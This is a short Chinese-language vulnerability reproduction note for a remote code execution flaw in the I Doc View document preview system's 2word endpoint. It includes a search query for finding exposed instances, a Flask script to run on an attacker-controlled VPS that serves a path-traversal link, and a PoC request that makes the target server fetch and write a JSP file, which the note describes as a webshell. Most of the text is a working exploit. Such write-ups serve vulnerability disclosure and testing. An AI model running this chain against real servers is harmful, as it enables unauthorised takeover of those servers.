I Doc View在线文档预览系统2word存在远程代码执行漏洞
一、漏洞简介
I Doc View在线文档预览系统是由北京卓软在线信息技术有限公司开发的一套系统,用于在Web环境中展示和预览各种文档类型,如文本文档、电子表格、演示文稿、PDF文件等。I Doc View在线文档预览系统远程代码执行漏洞情报。攻击者可利用该漏洞使服务器下载恶意文件,获取服务器控制权限。
二、影响版本
- I Doc View
三、资产测绘
- hunter
app.name="I Doc View"
- 特征
四、漏洞复现
- 将下列脚本放到vps服务器上安装
flsk
from flask import Flask
app = Flask(__name__)
@app.route('/index.html')
def step1():
return '''<link href="/..\\..\\..\\docview\\1.jsp">'''
@app.route('/..\\..\\..\\docview\\1.jsp')
def step2():
return '''<%
out.print("123");
%>'''
if __name__ == '__main__':
app.run(host="0.0.0.0", port=8088)
pip3 install flask
- 运行该脚本,将在
8088
端口上启用一个web服务器
python3 main.py
- 通过poc远程下载
webshell
,url
为上一步地址
/html/2word?url=http://xx.xx.xx.xx/index.html
- 下载文件地址
/1.jsp